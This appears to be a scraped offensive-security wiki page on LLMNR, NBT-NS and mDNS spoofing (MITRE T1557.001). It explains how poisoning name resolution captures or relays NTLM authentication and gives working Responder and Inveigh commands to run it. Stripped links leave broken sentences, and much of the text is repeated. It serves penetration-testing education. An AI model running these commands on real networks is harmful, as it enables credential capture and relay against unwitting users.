LLMNR, NBT-NS, mDNS spoofing

MITRE ATT&CK™ Sub-technique T1557.001

PreviousWSUS spoofing NextADIDNS poisoning

Last updated 1 year ago

Was this helpful?

LLMNR, NBT-NS, mDNS spoofing

MITRE ATT&CK™ Sub-technique T1557.001

In some environments (like Windows ones), multicast name resolution protocols are enabled by default, such as LLMNR (Local-Link Multicast Name Resolution), NBT-NS (NetBIOS Name Service) and mDNS (multicast Domain Name System). Those environments can fallback to those protocols when standard domain name resolution protocols fail. Windows systems attempt to resolve names in the following order: DNS, LLMNR and NBT-NS.

Attackers can then answer those multicast or broadcast queries. The victims are then redirected to the attacker asking them to authenticate in order to access whatever they ask for. Their authentication is then relayed.

(Python) and (Powershell) are great tools for name poisoning. In addition to name poisoning, they also have the ability to start servers (listeners) that will and echo the NTLM hashes to the attacker. Another possibility would be to start similar listeners, and to other resources the attacker wants to access.

The following command will make Responder analyze the network to see if LLMNR, NBT-NS and mDNS are used, and to inspect BROWSER requests.

responder --interface "eth0" --analyze
responder -I "eth0" -A

The following command will start LLMNR, NBTS and mDNS spoofing. Name resolution queries for the wpad server will be answered just like any other query. Fake authentication servers (HTTP/S, SMB, SQL, FTP, IMAP, POP3, DNS, LDAP, ...) will .

responder --interface "eth0"
responder -I "eth0"

The following command will make Inveigh inspect the network to see if LLMNR, NBT-NS and mDNS are used.

Invoke-Inveigh -ConsoleOutput Y -Inspect

Inveigh also starts a WPAD rogue proxy server by default for .

Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y

Flags like -ADIDNS, -ADIDNSForest, -ADIDNSCleanup, -ADIDNSThreshold and more can be set to combine LLMNR, NBT-NS and mDNS spoofing with .

can be really useful to help master Inveigh and its support functions

Clear-Inveigh to clear the $inveigh hashtable
Get-Inveigh to get data from the $inveigh hashtable
Stop-Inveigh to stop all running Inveigh modules
Watch-Inveigh to enable real time console output

Resources

PreviousWSUS spoofing NextADIDNS poisoning

Last updated 1 year ago

Was this helpful?

The following command will make Responder analyze the network to see if LLMNR, NBT-NS and mDNS are used, and to inspect BROWSER requests.

responder --interface "eth0" --analyze
responder -I "eth0" -A

responder --interface "eth0"
responder -I "eth0"

The following command will make Inveigh inspect the network to see if LLMNR, NBT-NS and mDNS are used.

Invoke-Inveigh -ConsoleOutput Y -Inspect

Inveigh also starts a WPAD rogue proxy server by default for .

Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y

Flags like -ADIDNS, -ADIDNSForest, -ADIDNSCleanup, -ADIDNSThreshold and more can be set to combine LLMNR, NBT-NS and mDNS spoofing with .

can be really useful to help master Inveigh and its support functions

Clear-Inveigh to clear the $inveigh hashtable
Get-Inveigh to get data from the $inveigh hashtable
Stop-Inveigh to stop all running Inveigh modules
Watch-Inveigh to enable real time console output

Resources

Local Network Attacks: LLMNR and NBT-NS Poisoning - Stern SecurityStern Security